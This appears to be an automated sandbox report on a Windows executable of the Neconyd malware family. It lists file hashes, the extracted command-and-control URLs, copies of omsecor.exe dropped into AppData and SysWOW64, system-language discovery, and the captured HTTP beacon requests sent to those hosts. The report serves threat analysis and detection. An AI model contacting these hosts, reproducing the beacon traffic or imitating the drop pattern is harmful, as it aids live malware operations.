Analysis
-
max time kernel
114s -
max time network
118s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12/01/2025, 11:05 UTC
Static task
static1
Behavioral task
behavioral1
Sample
3b70d7a6eca937fbf9c3253e2e55733008ae25f19e054afcc7e5bdf2a170b7b3.exe
Resource
win7-20240903-en
General
-
Target
3b70d7a6eca937fbf9c3253e2e55733008ae25f19e054afcc7e5bdf2a170b7b3.exe
-
Size
33KB
-
MD5
e5b42dd7efabacf213b0424c30e7ae8e
-
SHA1
f77548bd265bf7e742a37ddfa47b154a845a3567
-
SHA256
3b70d7a6eca937fbf9c3253e2e55733008ae25f19e054afcc7e5bdf2a170b7b3
-
SHA512
ee79cf176c41424e0487571eb9d59c57a8e2544f1b9acbb6e15feccaf0eac441d6ff3a8825d5ad2d57e2b106ab65e78007fc65d9cb95136b1c6904da9822adb2
-
SSDEEP
768:0fVhP/4kt3+9IV6Y90ksQ1oWHT0hh0vy9S5fsYGbTmoN/yE56hlSQ7DF:0fVRztyHo8QNHTk0qE5fslvN/956qo
Malware Config
Extracted
neconyd
http://ow5dirasuek.com/
http://mkkuei4kdsz.com/
http://lousta.net/
Signatures
-
Neconyd family
-
Executes dropped EXE 3 IoCs
pid Process 2604 omsecor.exe 4916 omsecor.exe 3888 omsecor.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\omsecor.exe omsecor.exe -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3b70d7a6eca937fbf9c3253e2e55733008ae25f19e054afcc7e5bdf2a170b7b3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language omsecor.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language omsecor.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language omsecor.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 372 wrote to memory of 2604 372 3b70d7a6eca937fbf9c3253e2e55733008ae25f19e054afcc7e5bdf2a170b7b3.exe 82 PID 372 wrote to memory of 2604 372 3b70d7a6eca937fbf9c3253e2e55733008ae25f19e054afcc7e5bdf2a170b7b3.exe 82 PID 372 wrote to memory of 2604 372 3b70d7a6eca937fbf9c3253e2e55733008ae25f19e054afcc7e5bdf2a170b7b3.exe 82 PID 2604 wrote to memory of 4916 2604 omsecor.exe 92 PID 2604 wrote to memory of 4916 2604 omsecor.exe 92 PID 2604 wrote to memory of 4916 2604 omsecor.exe 92 PID 4916 wrote to memory of 3888 4916 omsecor.exe 93 PID 4916 wrote to memory of 3888 4916 omsecor.exe 93 PID 4916 wrote to memory of 3888 4916 omsecor.exe 93
Processes
-
C:\Users\Admin\AppData\Local\Temp\3b70d7a6eca937fbf9c3253e2e55733008ae25f19e054afcc7e5bdf2a170b7b3.exe"C:\Users\Admin\AppData\Local\Temp\3b70d7a6eca937fbf9c3253e2e55733008ae25f19e054afcc7e5bdf2a170b7b3.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:372 -
C:\Users\Admin\AppData\Roaming\omsecor.exeC:\Users\Admin\AppData\Roaming\omsecor.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\SysWOW64\omsecor.exeC:\Windows\System32\omsecor.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4916 -
C:\Users\Admin\AppData\Roaming\omsecor.exeC:\Users\Admin\AppData\Roaming\omsecor.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3888
-
-
-
Network
-
Remote address:8.8.8.8:53Requestlousta.netIN AResponselousta.netIN A193.166.255.171
-
Remote address:8.8.8.8:53Request228.249.119.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request172.210.232.199.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request69.31.126.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request184.115.23.2.in-addr.arpaIN PTRResponse184.115.23.2.in-addr.arpaIN PTRa2-23-115-184deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request209.205.72.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request200.163.202.172.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request206.23.85.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestmkkuei4kdsz.comIN AResponsemkkuei4kdsz.comIN A15.197.204.56mkkuei4kdsz.comIN A3.33.243.145
-
Remote address:15.197.204.56:80RequestGET /1/948.html HTTP/1.1
From: 133811535433287164
Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w<^/8/55\/7\40`ae-c8ac8/4`^d03.6a`
Host: mkkuei4kdsz.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
date: Sun, 12 Jan 2025 11:06:46 GMT
content-length: 114
-
Remote address:8.8.8.8:53Request56.204.197.15.in-addr.arpaIN PTRResponse56.204.197.15.in-addr.arpaIN PTRa3edc0dabdef92d6dawsglobalacceleratorcom
-
Remote address:8.8.8.8:53Requestow5dirasuek.comIN AResponseow5dirasuek.comIN A52.34.198.229
-
Remote address:52.34.198.229:80RequestGET /757/464.html HTTP/1.1
From: 133811535433287164
Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w<^/8/55\/7\40`ae-c8ac8/4`^d03.6a`
Host: ow5dirasuek.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Sun, 12 Jan 2025 11:06:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=04736116fbff590b0bfe3b511905b3ee|181.215.176.83|1736680017|1736680017|0|1|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
-
Remote address:8.8.8.8:53Request229.198.34.52.in-addr.arpaIN PTRResponse229.198.34.52.in-addr.arpaIN PTRec2-52-34-198-229 us-west-2compute amazonawscom
-
260 B 5
-
260 B 5
-
465 B 388 B 6 4
HTTP Request
GET http://mkkuei4kdsz.com/1/948.htmlHTTP Response
200 -
467 B 623 B 6 5
HTTP Request
GET http://ow5dirasuek.com/757/464.htmlHTTP Response
200 -
260 B 5
-
156 B 3
-
56 B 72 B 1 1
DNS Request
lousta.net
DNS Response
193.166.255.171
-
73 B 159 B 1 1
DNS Request
228.249.119.40.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.210.232.199.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
69.31.126.40.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
184.115.23.2.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
209.205.72.20.in-addr.arpa
-
74 B 160 B 1 1
DNS Request
200.163.202.172.in-addr.arpa
-
71 B 145 B 1 1
DNS Request
206.23.85.13.in-addr.arpa
-
61 B 93 B 1 1
DNS Request
mkkuei4kdsz.com
DNS Response
15.197.204.563.33.243.145
-
72 B 128 B 1 1
DNS Request
56.204.197.15.in-addr.arpa
-
61 B 77 B 1 1
DNS Request
ow5dirasuek.com
DNS Response
52.34.198.229
-
72 B 135 B 1 1
DNS Request
229.198.34.52.in-addr.arpa
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
33KB
MD55b24490bc25bcfff2220736c40d324c6
SHA1141df748d6e2ebb93f7a60569f5391407fc1d02a
SHA256728793d530a87c1379b45bbaee3ebb612ae1eec96f85f24c2b8adc9c299dde24
SHA512c1d8f8805d87db895aeab0e11545c10e10f746b492785aedb25bbd35a92d7e21ba5ad6c3f01bfa5f46d88a69a1a8a665a05e45b4ba45992f462f0a51584908ca
-
Filesize
33KB
MD515e7f5fa401f251a24efc732a3a5f481
SHA10d84648be9e233bc4ee6e405ff2edc1efcf180e3
SHA2567f8aacd13057a1c005ac3be68eff21d684426061a8aa84895bd06b193be54e89
SHA5120041ea52f14391245de7b76da9f4845fb6e6889942794004bcb5c1e4366edfdb005b5bfc33658415dc561bd5e1f5826a5c1493594df9b051d324d6425060263c
-
Filesize
33KB
MD5c6a9fbfd631de4fd9f435b6a53e43920
SHA14b1fd530806eab0ef7cc82e8d826c0ed7a476fd4
SHA2568196295c545242bcaaecac03b2d3e7118d29ca0f90c89315265c915dc7b1be18
SHA51243816449a9434e0b420ef55a01758b33644924d241e8def2e0703f3ed4c53bfbe13cbf9defd575bb016f865ab9cc78b504f52fff510adf80705b8f3245aaf25b